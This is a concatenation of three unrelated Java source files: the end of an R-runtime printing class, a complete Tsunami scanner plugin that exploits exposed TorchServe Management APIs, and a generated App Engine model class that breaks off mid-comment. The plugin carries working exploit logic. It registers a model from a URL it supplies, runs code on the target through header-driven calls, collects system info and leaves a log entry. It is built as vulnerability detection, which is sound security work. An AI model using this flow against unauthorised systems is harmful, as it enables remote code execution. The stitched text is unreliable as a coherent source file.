void printResultImpl(RContext ctx, Object originalResult) { Object result = evaluatePromise(originalResult); result = RRuntime.asAbstractVector(result); MaterializedFrame callingFrame = REnvironment.globalEnv(ctx).getFrame(); printValue(ctx, callingFrame, result); } private static void printValue(RContext ctx, MaterializedFrame callingFrame, Object result) { if (result instanceof RBaseObject || result instanceof TruffleObject) { Object resultValue = ShareObjectNode.share(evaluatePromise(result)); if (result instanceof RAttributable && ((RAttributable) result).isS4()) { Object printMethod = REnvironment.getRegisteredNamespace(ctx, "methods").get("show"); RFunction function = (RFunction) evaluatePromise(printMethod); CallRFunctionNode.executeSlowpath(function, RCaller.createInvalid(callingFrame), callingFrame, new Object[]{resultValue}, null); } else { Object printMethod = REnvironment.globalEnv().findFunction("print"); RFunction function = (RFunction) evaluatePromise(printMethod); RSyntaxNode printCall = ((REngine) RContext.getEngine()).replPrintCallNode; CallRFunctionNode.executeSlowpath(function, RCaller.create(callingFrame, printCall), callingFrame, new Object[]{resultValue, RArgsValuesAndNames.EMPTY}, null); } UnShareObjectNode.unshare(resultValue); } else { // this supports printing of non-R values (via toString for now) String str; if (result == null) { str = "[polyglot value (null)]"; } else if (result instanceof CharSequence) { str = "[1] \"" + result + "\""; } else { str = String.valueOf(result); } RContext.getInstance().getConsole().println(str); } } private void initReplPrintSyntaxCallNode() { ParsedExpression parsedPrintExpr = parse(Source.newBuilder(RRuntime.R_LANGUAGE_ID, "(function (x, ...) UseMethod(\"print\"))(x)", "<parse>").build(), false); RPairList printPL = (RPairList) parsedPrintExpr.getExpression().getDataAt(0); replPrintCallNode = RASTUtils.createSyntaxNodeForRValue(printPL); } private static Object evaluatePromise(Object value) { return value instanceof RPromise ? PromiseHelperNode.evaluateSlowPath((RPromise) value) : value; } }
google/tsunami-security-scanner-plugins
35,727
doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java
/* * Copyright 2023 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.tsunami.plugins.detectors.rce.torchserve; import static com.google.common.base.Preconditions.checkNotNull; import com.google.common.flogger.GoogleLogger; import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.gson.Gson; import com.google.gson.GsonBuilder; import com.google.gson.JsonArray; import com.google.gson.JsonElement; import com.google.gson.JsonObject; import com.google.gson.JsonParseException; import com.google.gson.JsonParser; import com.google.tsunami.common.data.NetworkServiceUtils; import com.google.tsunami.common.net.http.HttpClient; import com.google.tsunami.common.net.http.HttpHeaders; import com.google.tsunami.common.net.http.HttpMethod; import com.google.tsunami.common.net.http.HttpRequest; import com.google.tsunami.common.net.http.HttpResponse; import com.google.tsunami.plugin.payload.Payload; import com.google.tsunami.plugin.payload.PayloadGenerator; import com.google.tsunami.proto.AdditionalDetail; import com.google.tsunami.proto.NetworkService; import com.google.tsunami.proto.PayloadGeneratorConfig; import com.google.tsunami.proto.Severity; import com.google.tsunami.proto.TextData; import java.io.IOException; import java.security.MessageDigest; import java.time.Instant; import java.util.ArrayList; import java.util.List; import javax.inject.Inject; import okhttp3.HttpUrl; import org.checkerframework.checker.nullness.qual.Nullable; public class TorchServeExploiter { private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); private final HttpClient httpClient; public final Details details; private final PayloadGenerator payloadGenerator; private final TorchServeManagementAPIExploiterWebServer webServer; private Payload payload; public TorchServeRandomUtils randomUtils; enum ExploitationMode { // Just detect the TorchServe Management API, do not attempt to exploit. BASIC, // Provide Tsunami callback server's URL as a model source, consider any callback as a // confirmation. SSRF, // Provide a static URL as a model source, verify code execution directly. STATIC, // Serve a model locally, verify code execution directly. LOCAL } public class Details { // Effective settings (merged from config file and cli args) public ExploitationMode exploitationMode; public String staticUrl; public String localBindHost; public int localBindPort; public String localAccessibleUrl; // Data collected during the exploit public List<String> models; public boolean hashVerification = false; public boolean callbackVerification = false; public String systemInfo; public boolean cleanupFailed = false; public String modelName; public String targetUrl; public String exploitUrl; public String messageLogged; static final String LOG_MESSAGE = "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + " for details. No malicious activity intended. Timestamp: %s"; /** * Constructor for Details class. Initializes the details with configuration and command line * arguments. * * @param config Configuration object. * @param args Command line arguments. */ public Details(TorchServeManagementApiConfig config, TorchServeManagementApiArgs args) { initializeExploitationMode(args, config); initializeUrls(args, config); validateParameters(); } private void initializeExploitationMode( TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) { String mode = args.exploitationMode != null ? args.exploitationMode : config.exploitationMode; if (mode.equals("auto")) { this.exploitationMode = payloadGenerator.isCallbackServerEnabled() ? ExploitationMode.SSRF : ExploitationMode.BASIC; } else { this.exploitationMode = ExploitationMode.valueOf(mode.toUpperCase()); } } private void initializeUrls( TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) { this.staticUrl = args.staticUrl != null ? args.staticUrl : config.staticUrl; this.localBindHost = args.localBindHost != null ? args.localBindHost : config.localBindHost; this.localBindPort = args.localBindPort != 0 ? args.localBindPort : config.localBindPort; this.localAccessibleUrl = args.localAccessibleUrl != null ? args.localAccessibleUrl : config.localAccessibleUrl; } private void validateParameters() { if (this.exploitationMode == ExploitationMode.STATIC && this.staticUrl == null) { throw new IllegalArgumentException( "Static mode requires --torchserve-management-api-model-static-url"); } if (this.exploitationMode == ExploitationMode.LOCAL) { if (this.localBindHost == null || this.localBindPort == 0 || this.localAccessibleUrl == null) { throw new IllegalArgumentException( "Local mode requires --torchserve-management-api-local-bind-host," + " --torchserve-management-api-local-bind-port and" + " --torchserve-management-api-local-accessible-url"); } } } public Severity getSeverity() { return isVerified() ? Severity.CRITICAL : Severity.LOW; } public boolean isVerified() { return this.hashVerification || this.callbackVerification; } public AdditionalDetail generateAdditionalDetails() { StringBuilder additionalDetails = new StringBuilder(); switch (this.exploitationMode) { case BASIC: additionalDetails.append( "Callback verification is not enabled in Tsunami configuration, so the exploit" + " could not be confirmed and only the Management API detection is reported." + " It is recommended to enable callback verification for more conclusive" + " vulnerability assessment."); if (this.models != null && !this.models.isEmpty()) { additionalDetails .append("\nModels found on the target:\n - ") .append(String.join("\n - ", this.models)); } break; case SSRF: additionalDetails.append( "A callback was received from the target while adding a new model, confirming the" + " exploit. Code execution was not verified directly. For a more direct" + " confirmation of remote code execution, consider using STATIC or LOCAL" + " modes."); if (this.models != null && !this.models.isEmpty()) { additionalDetails .append("\nModels found on the target:\n - ") .append(String.join("\n - ", this.models)); } break; case STATIC: case LOCAL: additionalDetails .append( "Code execution was verified by adding a new model to the target and performing" + " following actions:\n") .append( " - Calculating a hash of a random value and comparing it to the value returned" + " by the target (" + (this.hashVerification ? "Success" : "Failure") + ")\n"); if (payloadGenerator.isCallbackServerEnabled()) { additionalDetails.append( " - Sending a callback to the target and confirming that the callback URL was" + " received (" + (this.callbackVerification ? "Success" : "Failure") + ")\n"); } additionalDetails .append("System info collected from the target:\n") .append(prettyPrintJson(this.systemInfo)) .append("\n\n") .append("The following log entry was generated on the target:\n\n") .append(this.messageLogged); if (this.models != null && !this.models.isEmpty()) { additionalDetails .append("\n\nModels found on the target:\n - ") .append(String.join("\n - ", this.models)); } break; } return AdditionalDetail.newBuilder() .setDescription("Additional details") .setTextData(TextData.newBuilder().setText(additionalDetails.toString()).build()) .build(); } } @Inject public TorchServeExploiter( TorchServeManagementApiConfig config, TorchServeManagementApiArgs args, HttpClient httpClient, PayloadGenerator payloadGenerator, TorchServeManagementAPIExploiterWebServer webServer, TorchServeRandomUtils randomUtils) { this.httpClient = checkNotNull(httpClient, "httpClient must not be null") .modify() .setFollowRedirects(false) .build(); this.payloadGenerator = checkNotNull(payloadGenerator, "payloadGenerator must not be null"); this.details = new Details( checkNotNull(config, "config must not be null"), checkNotNull(args, "args must not be null")); this.webServer = checkNotNull(webServer, "webServer must not be null"); this.randomUtils = checkNotNull(randomUtils, "randomUtils must not be null"); } /** * Verifies if the target service is vulnerable to TorchServe Management API RCE. * * @param service The network service to be checked. * @return Details of the vulnerability if found, null otherwise. */ public @Nullable Details isServiceVulnerable(NetworkService service) { HttpUrl targetUrl = buildTargetUrl(service); try { return isServiceVulnerable(targetUrl); } catch (IOException e) { logger.atWarning().withCause(e).log( "Failed to check if service is vulnerable due to network error"); } catch (Exception e) { logger.atSevere().withCause(e).log( "Unexpected error occurred while checking service vulnerability"); } finally { cleanupExploit(); } return null; } private @Nullable Details isServiceVulnerable(HttpUrl targetUrl) throws IOException { if (!isTorchServe(targetUrl)) { return null; } logger.atInfo().log("Target matches TorchServe Management API fingerprint"); // Scrape the list of models from the target String modelName = getModelName(targetUrl); String url; switch (this.details.exploitationMode) { case BASIC: logger.atFine().log("BASIC MODE"); // It looks like TorchServe management API, but we can't exploit it as callback // functionality has not been enabled logger.atInfo().log("Callback verification is not enabled, skipping exploit"); return this.details; case SSRF: logger.atFine().log("SSRF MODE"); // Set the model URL to the Tsunami callback server, consider any callback as a confirmation executeExploit(targetUrl, getTsunamiCallbackUrl(), modelName); return checkTsunamiCallbackUrl() ? this.details : null; case STATIC: logger.atFine().log("STATIC MODE"); // Use the provided URL as a model source, confirm code execution directly url = this.details.staticUrl; break; case LOCAL: logger.atFine().log("LOCAL MODE"); // Serve the model locally, confirm code execution directly url = serveExploitFile(modelName); break; default: throw new IllegalArgumentException("Invalid mode: " + this.details.exploitationMode); } // Common verification for STATIC and LOCAL executeExploit(targetUrl, url, modelName); // 1. Was the model added to the list of models? // if (!getModelNames(targetUrl).contains(modelName)) return null; if (!modelExists(targetUrl, modelName)) { return null; } // 2. Can we simulate code execution (hash + callback)? if (!verifyExploit(targetUrl, modelName)) { return null; } // Report confirmed vulnerability return this.details; } /** Verifies that the model was added to the list of models on the target. */ private boolean modelExists(HttpUrl targetUrl, String modelName) throws IOException { HttpUrl url = targetUrl.newBuilder().addPathSegment("models").addPathSegment(modelName).build(); JsonElement response = sendHttpRequestGetJson(HttpMethod.GET, url, null); return response != null; } /** * Verifies if the exploit was successful on the target server. * * <p>This method simulates code execution through hash calculation and, if enabled, through * Tsunami's callback server. It also logs and collects system info from the target. * * @param targetUrl The URL of the target server. * @param modelName The name of the model used in the exploit. * @return True if the exploit is verified successfully, false otherwise. * @throws IOException If an I/O error occurs during the verification process. */ private boolean verifyExploit(HttpUrl targetUrl, String modelName) throws IOException { boolean verified = false; // Simulate code execution through a hash calculation String randomValue = randomUtils.getRandomValue(); String hashReceived = interact(targetUrl, modelName, "tsunami-execute", randomValue); this.details.hashVerification = randomUtils.validateHash(hashReceived, randomValue); verified = this.details.hashVerification; // Simulate code execution through Tsunami's callback server if (this.payloadGenerator.isCallbackServerEnabled()) { String callbackUrl = getTsunamiCallbackUrl(); interact(targetUrl, modelName, "tsunami-callback", callbackUrl); verified |= checkTsunamiCallbackUrl(); } // One of the verification methods must succeed for the exploit to be confirmed if (!verified) { return false; } // generate the log file entry on the remote server and collect system info // generate the log message by adding a timestamp to the template this.details.messageLogged = String.format(Details.LOG_MESSAGE, Instant.now().toString()); interact(targetUrl, modelName, "tsunami-log", this.details.messageLogged); this.details.systemInfo = interact(targetUrl, modelName, "tsunami-info", "True"); return true; } private boolean compareHash(String randomValue, String hash) { try { MessageDigest md = MessageDigest.getInstance("MD5"); byte[] digest = md.digest(randomValue.getBytes()); String expectedHash = String.format("%032x", new java.math.BigInteger(1, digest)); return expectedHash.equals(hash); } catch (java.security.NoSuchAlgorithmException e) { return false; } } /** * Sends an HTTP request to interact with a specific model on the TorchServe server. * * <p>This method communicates with the TorchServe model via the Management API, utilizing the * 'customized=true' query parameter to bypass the need for locating the Inference API. It sends a * request with custom headers and extracts the response from the 'customizedMetadata' field. * * <p>Note: This approach is used to directly interact with the model through Management API, * avoiding issues with locating the Inference API which may be on a different port or not * exposed. * * @param targetUrl The base URL of the TorchServe Management API. * @param modelName The name of the model to interact with. * @param headerName The name of the header to send in the request. * @param headerValue The value of the header to send in the request. * @return The response extracted from 'customizedMetadata' field, or null if an error occurs. * @throws IOException If an I/O error occurs during the HTTP request. */ private @Nullable @CanIgnoreReturnValue String interact( HttpUrl targetUrl, String modelName, String headerName, String headerValue) throws IOException { // Generally in order to talk to a model we need to use an Inference API (default port: 8080) // which is separate // from the Management API (default port: 8081). However, there is a way to hit the model even // through Management // API by adding the "customized=true" query parameter to the request, as documented here: // // https://pytorch.org/serve/management_api.html#:~:text=customized=true // // We're using this trick to send a request to the model in order to avoid the need to locate // the Inference API // (which might be remapped to an arbitrary port or not exposed at all). // With this approach, the actual payload is passed through `tsunami-*` headers and responses // are placed to the // "customizedMetadata" field of the response. // // Look at model.py for the supported headers and their meaning. // // $ curl http://torchserve-081:8081/models/somerandomname?customized=true \ // -H 'tsunami-header: <An input value goes here>' // [ // { // "modelName": "somerandomname", // "modelVersion": "1.0", // "modelUrl": "https://s3.amazonaws.com/model.mar", // "runtime": "python", // "minWorkers": 1, // "maxWorkers": 1, // "batchSize": 1, // "maxBatchDelay": 100, // "loadedAtStartup": false, // "workers": [ // { // "id": "9029", // "startTime": "2023-12-18T22:50:13.994Z", // "status": "READY", // "memoryUsage": 227737600, // "pid": 1719, // "gpu": false, // "gpuUsage": "N/A" // } // ], // "customizedMetadata": "<Output value appears here>" // } // ] HttpHeaders header = HttpHeaders.builder().addHeader(headerName, headerValue).build(); HttpUrl url = targetUrl .newBuilder() .addPathSegment("models") .addPathSegment(modelName) .addQueryParameter("customized", "true") .build(); try { JsonObject response = sendHttpRequestGetJsonArray(HttpMethod.GET, url, header).get(0).getAsJsonObject(); String result = response.get("customizedMetadata").getAsString(); return result; } catch (NullPointerException | ClassCastException e) { return null; } } /** * Constructs the target URL for a given network service. * * <p>This method builds the root URL for a web application based on the provided network service * details, typically used as the base URL for further API interactions. * * @param service The network service for which the URL is being constructed. * @return The constructed HttpUrl object for the network service. */ private HttpUrl buildTargetUrl(NetworkService service) { return HttpUrl.parse(NetworkServiceUtils.buildWebApplicationRootUrl(service)); } /** * Generates a callback URL for Tsunami's payload generator. * * <p>This method configures and generates a payload for Tsunami's callback server, typically used * in SSRF vulnerability testing. The callback URL is used to verify if an external interaction * with the Tsunami server occurs, indicating a successful SSRF exploit. * * @return The generated callback URL for the Tsunami payload. */ private String getTsunamiCallbackUrl() { PayloadGeneratorConfig config = PayloadGeneratorConfig.newBuilder() .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) .setInterpretationEnvironment( PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) .build(); this.payload = this.payloadGenerator.generate(config); return this.payload.getPayload(); } private boolean checkTsunamiCallbackUrl() { this.details.callbackVerification = this.payload != null && this.payload.checkIfExecuted(); return this.details.callbackVerification; } /** * Checks whether the specified target URL corresponds to a TorchServe management API. * * <p>This method sends a GET request to the target URL to retrieve the API description. It then * checks if the response matches the expected signature of a TorchServe management API. * * @param targetUrl The URL of the target service to be checked. * @return True if the target URL is a TorchServe management API, false otherwise. * @throws IOException If a network error occurs during the HTTP request. */ private boolean isTorchServe(HttpUrl targetUrl) throws IOException { try { JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "api-description"); return response != null && isTorchServeResponse(response); } catch (IOException e) { logger.atSevere().withCause(e).log("Error checking if target is TorchServe"); throw e; } } /** * Determines if the given response matches the expected signature of a TorchServe API. * * <p>Analyzes the JSON structure of the response to verify if it contains key elements that match * the TorchServe API's characteristics, such as the API title and the presence of specific * operation IDs. * * @param response The JSON object representing the HTTP response to analyze. * @return True if the response matches the expected TorchServe signature, false otherwise. */ private boolean isTorchServeResponse(JsonObject response) { // Expected JSON structure // { // "openapi": "3.0.1", // "info": { // "title": "TorchServe APIs", // "description": "TorchServe is a flexible and easy to use tool for serving deep learning // models", // "version": "0.8.1" // }, // "paths": { // "/models": { // "post": { // "description": "Register a new model in TorchServe.", // "operationId": "registerModel", String apiTitle = getNestedKey(response, "info", "title"); String registerModel = getNestedKey(response, "paths", "/models", "post", "operationId"); return response.has("openapi") && apiTitle != null && apiTitle.equals("TorchServe APIs") && registerModel != null && registerModel.equals("registerModel"); } /** * Retrieves a nested key value from a JSON object. * * <p>This method navigates through a JSON object using a sequence of keys to retrieve the final * value. It is primarily used for extracting specific data from complex JSON structures. * * @param object The JSON object from which to extract the value. * @param keys A sequence of keys used to navigate to the desired value in the JSON object. * @return The string value of the nested key, or null if the key does not exist or is not a * string. */ private @Nullable String getNestedKey(JsonObject object, String... keys) { try { // Traverse the JSON object until the last key - expect JsonObject at every step for (int i = 0; i < keys.length - 1; i++) { object = object.getAsJsonObject(keys[i]); } // Return the value of the last key - expect it to be a String return object.get(keys[keys.length - 1]).getAsString(); } catch (NullPointerException | ClassCastException e) { return null; } } /** * Generates a unique model name that does not already exist on the target TorchServe server. * * <p>This method retrieves a list of existing model names from the target server and generates a * new, random model name that is not in that list. * * @param targetUrl The URL of the TorchServe server to check for existing model names. * @return A unique model name. * @throws IOException If a network error occurs during the HTTP request. */ private String getModelName(HttpUrl targetUrl) throws IOException { // get the list of models from the target List<String> models = getModelNames(targetUrl); this.details.models = models; return generateRandomModelName(models); } /** * Generates a random model name that is not present in the provided list of existing models. * * <p>This method generates a random string and ensures that this string is not already used as a * model name on the target server. * * @param existingModels A list of model names that already exist on the server. * @return A randomly generated, unique model name. */ private String generateRandomModelName(List<String> existingModels) { String modelName; do { modelName = randomUtils.getRandomValue(); } while (existingModels.contains(modelName)); return modelName; } /** * Retrieves a list of model names from the TorchServe server. * * <p>Sends a GET request to the target server's API to fetch the list of currently loaded models. * Note: Handles pagination to retrieve all models if more than the default page limit. * * @param targetUrl The URL of the TorchServe server. * @return A list of model names present on the server. * @throws IOException If a network error occurs during the HTTP request. */ private List<String> getModelNames(HttpUrl targetUrl) throws IOException { // get the list of models from the target List<String> models = new ArrayList<>(); JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); if (response == null) { return models; } // TODO: there's pagination with default limit of 100 models per page // https://github.com/pytorch/serve/blob/master/docs/management_api.md#list-models // // Expected JSON structure: // "models": [ // { // "modelName": "squeezenet1_1", // "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar" // }, try { JsonArray modelsArray = response.getAsJsonArray("models"); for (JsonElement model : modelsArray) { models.add(model.getAsJsonObject().get("modelName").getAsString()); } } catch (NullPointerException | ClassCastException e) { // No models found, we'll return an empty list } return models; } /** * Removes a model from the TorchServe server by its name. * * <p>This method sends a DELETE request to the server's API to remove a model specified by its * name. * * @param targetUrl The URL of the TorchServe server. * @param modelName The name of the model to be removed. * @throws IOException If a network error occurs during the HTTP request. */ private void removeModelByName(HttpUrl targetUrl, String modelName) throws IOException { sendHttpRequestGetJsonObject(HttpMethod.DELETE, targetUrl, "models", modelName); } /** * Removes a model from the TorchServe server by its URL. * * <p>Retrieves the list of models from the server and searches for a model with the specified * URL. If found, it uses the model's name to remove it from the server. * * @param targetUrl The URL of the TorchServe server. * @param url The URL of the model to be removed. */ private void removeModelByUrl(HttpUrl targetUrl, String url) { try { // Get the list of models from the target JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); // Look for the model with the specified URL and remove it JsonArray modelsArray = response.getAsJsonArray("models"); for (JsonElement model : modelsArray) { JsonObject modelObject = model.getAsJsonObject(); if (modelObject.get("modelUrl").getAsString().equals(url)) { String modelName = modelObject.get("modelName").getAsString(); removeModelByName(targetUrl, modelName); } } } catch (NullPointerException | ClassCastException | IOException e) { // No models, nothing to remove } } /** * Starts the web server and serves the exploit file. * * <p>This method initiates the web server bound to a specified host and port, and serves an * exploit file located at a given URL. It is used in LOCAL exploitation mode to host the exploit * payload. * * @param modelName The name of the model to be used in the exploit file's name. * @return The URL where the exploit file is served. * @throws IOException If an error occurs while starting the web server. */ private String serveExploitFile(String modelName) throws IOException { this.webServer.start(this.details.localBindHost, this.details.localBindPort); HttpUrl baseUrl = HttpUrl.parse(this.details.localAccessibleUrl) .newBuilder() .addPathSegment(modelName + ".mar") .build(); return baseUrl.toString(); } /** * Executes the exploit against the target TorchServe service. * * <p>Constructs and sends an HTTP POST request to add a new model to the TorchServe service. The * response is analyzed to determine if the model registration was successful, indicating a * potential exploit. * * @param targetUrl The URL of the target TorchServe service. * @param exploitUrl The URL of the exploit payload. * @param modelName The name of the model to register. * @return True if the exploit execution led to successful model registration, false otherwise. * @throws IOException If a network error occurs during the HTTP request. */ private @CanIgnoreReturnValue boolean executeExploit( HttpUrl targetUrl, String exploitUrl, String modelName) throws IOException { HttpUrl url = targetUrl .newBuilder() .addPathSegment("models") .addEncodedQueryParameter("url", exploitUrl) .addQueryParameter("batch_size", "1") .addQueryParameter("initial_workers", "1") .addQueryParameter("synchronous", "true") .addQueryParameter("model_name", modelName) .build(); this.details.targetUrl = targetUrl.toString(); this.details.exploitUrl = exploitUrl; // Remove any existing models with the same URL removeModelByUrl(targetUrl, exploitUrl); JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.POST, url); if (response == null) { return false; } // Expected response (200): // // { "status": "Model \"squeezenet1_1\" Version: 1.0 registered with 1 initial workers" } // // Expected response (500): // { // "code": 500, // "type": "InternalServerException", // "message": "Model file already exists squeezenet1_1.mar" // } String message = getNestedKey(response, "status"); if (message == null) { return false; } return message.contains("registered with 1 initial workers"); } /** * Performs cleanup operations after exploit execution. * * <p>This method removes the added model from the TorchServe service and stops the web server. It * is essential for reverting changes made during the exploitation process to maintain a clean * state. */ private void cleanupExploit() { if (this.details.modelName == null || this.details.targetUrl == null) { return; } try { removeModelByName(HttpUrl.parse(this.details.targetUrl), this.details.modelName); } catch (IOException e) { logger.atWarning().withCause(e).log("Failed to cleanup exploit"); this.details.cleanupFailed = true; } this.webServer.stop(); } /** * Sends an HTTP request and returns the response as a JsonObject. * * @param method The HTTP method to use for the request. * @param baseUrl The base URL for the request. * @param pathSegments Additional path segments to append to the base URL. * @return The response as a JsonObject, or null if the response is not a valid JSON object. * @throws IOException If a network error occurs during the HTTP request. */ private @CanIgnoreReturnValue @Nullable JsonObject sendHttpRequestGetJsonObject( HttpMethod method, HttpUrl baseUrl, String... pathSegments) throws IOException { return sendHttpRequestGetJson(method, baseUrl, null, pathSegments).getAsJsonObject(); } /** * Sends an HTTP request and returns the response as a JsonArray. * * @param method The HTTP method to use for the request. * @param baseUrl The base URL for the request. * @param headers The HTTP headers to include in the request. * @param pathSegments Additional path segments to append to the base URL. * @return The response as a JsonArray, or null if the response is not a valid JSON array. * @throws IOException If a network error occurs during the HTTP request. */ private @Nullable JsonArray sendHttpRequestGetJsonArray( HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments) throws IOException { return sendHttpRequestGetJson(method, baseUrl, headers, pathSegments).getAsJsonArray(); } /** * Sends an HTTP request and returns the response body as a JsonElement. * * @param method The HTTP method to use for the request. * @param baseUrl The base URL for the request. * @param headers The HTTP headers to include in the request. * @param pathSegments Additional path segments to append to the base URL. * @return The response body as a JsonElement, or null if the response body is not valid JSON. * @throws IOException If a network error occurs during the HTTP request. */ private @Nullable JsonElement sendHttpRequestGetJson( HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments) throws IOException { if (headers == null) { headers = HttpHeaders.builder().build(); } HttpUrl url = baseUrl; if (pathSegments.length > 0) { url = url.newBuilder().addPathSegments(String.join("/", pathSegments)).build(); } HttpRequest request = HttpRequest.builder().setHeaders(headers).setMethod(method).setUrl(url).build(); HttpResponse response = this.httpClient.send(request); return response .bodyJson() .orElseThrow(() -> new IOException("Couldn't parse response body as JSON")); } /** * Pretty prints a JSON string. * * <p>Formats a given JSON string to a more readable form with proper indentation. If the input * string is not valid JSON, it returns the original string. * * @param json The JSON string to be pretty printed. * @return The pretty-printed version of the JSON string, or the original string if it's not valid * JSON. */ private String prettyPrintJson(String json) { try { Gson gson = new GsonBuilder().setPrettyPrinting().create(); JsonParser jp = new JsonParser(); JsonElement je = jp.parse(json); return gson.toJson(je); } catch (JsonParseException e) { return json; } } }
googleapis/google-api-java-client-services
35,846
clients/google-api-services-appengine/v1/1.30.1/com/google/api/services/appengine/v1/model/Version.java
/* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ /* * This code was generated by https://github.com/googleapis/google-api-java-client-services/ * Modify at your own risk. */ package com.google.api.services.appengine.v1.model; /** * A Version resource is a specific set of source code and configuration files that are deployed * into a service. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the App Engine Admin API. For a detailed explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class Version extends com.google.api.client.json.GenericJson { /** * Serving configuration for Google Cloud Endpoints * (https://cloud.google.com/appengine/docs/python/endpoints/).Only returned in GET requests if * view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private ApiConfigHandler apiConfig; /** * Automatic scaling is based on request rate, response latencies, and other application metrics. * Instances are dynamically created and destroyed as needed in order to handle traffic. * The value may be {@code null}. */ @com.google.api.client.util.Key private AutomaticScaling automaticScaling; /** * A service with basic scaling will create an instance when the application receives a request. * The instance will be turned down when the app becomes idle. Basic scaling is ideal for work * that is intermittent or driven by user activity. * The value may be {@code null}. */ @com.google.api.client.util.Key private BasicScaling basicScaling; /** * Metadata settings that are supplied to this version to enable beta runtime features. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.Map<String, java.lang.String> betaSettings; /** * Environment variables available to the build environment.Only returned in GET requests if * view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.Map<String, java.lang.String> buildEnvVariables; /** * Time that this version was created.@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key private String createTime; /** * Email address of the user who created this version.@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String createdBy; /** * Duration that static files should be cached by web proxies and browsers. Only applicable if the * corresponding StaticFilesHandler (https://cloud.google.com/appengine/docs/admin- * api/reference/rest/v1/apps.services.versions#StaticFilesHandler) does not specify its own * expiration time.Only returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private String defaultExpiration; /** * Code and application artifacts that make up this version.Only returned in GET requests if * view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private Deployment deployment; /** * Total size in bytes of all the files that are included in this version and currently hosted on * the App Engine disk.@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key @com.google.api.client.json.JsonString private java.lang.Long diskUsageBytes; /** * Cloud Endpoints configuration.If endpoints_api_service is set, the Cloud Endpoints Extensible * Service Proxy will be provided to serve the API implemented by the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private EndpointsApiService endpointsApiService; /** * The entrypoint for the application. * The value may be {@code null}. */ @com.google.api.client.util.Key private Entrypoint entrypoint; /** * App Engine execution environment for this version.Defaults to standard. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String env; /** * Environment variables available to the application.Only returned in GET requests if view=FULL * is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.Map<String, java.lang.String> envVariables; /** * Custom static error pages. Limited to 10KB per page.Only returned in GET requests if view=FULL * is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<ErrorHandler> errorHandlers; static { // hack to force ProGuard to consider ErrorHandler used, since otherwise it would be stripped out // see https://github.com/google/google-api-java-client/issues/543 com.google.api.client.util.Data.nullOf(ErrorHandler.class); } /** * An ordered list of URL-matching patterns that should be applied to incoming requests. The first * matching URL handles the request and other request handlers are not attempted.Only returned in * GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<UrlMap> handlers; static { // hack to force ProGuard to consider UrlMap used, since otherwise it would be stripped out // see https://github.com/google/google-api-java-client/issues/543 com.google.api.client.util.Data.nullOf(UrlMap.class); } /** * Configures health checking for instances. Unhealthy instances are stopped and replaced with new * instances. Only applicable in the App Engine flexible environment.Only returned in GET requests * if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private HealthCheck healthCheck; /** * Relative name of the version within the service. Example: v1. Version names can contain only * lowercase letters, numbers, or hyphens. Reserved names: "default", "latest", and any name with * the prefix "ah-". * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String id; /** * Before an application can receive email or XMPP messages, the application must be configured to * enable the service. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> inboundServices; /** * Instance class that is used to run this version. Valid values are: AutomaticScaling: F1, F2, * F4, F4_1G ManualScaling or BasicScaling: B1, B2, B4, B8, B4_1GDefaults to F1 for * AutomaticScaling and B1 for ManualScaling or BasicScaling. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String instanceClass; /** * Configuration for third-party Python runtime libraries that are required by the * application.Only returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<Library> libraries; static { // hack to force ProGuard to consider Library used, since otherwise it would be stripped out // see 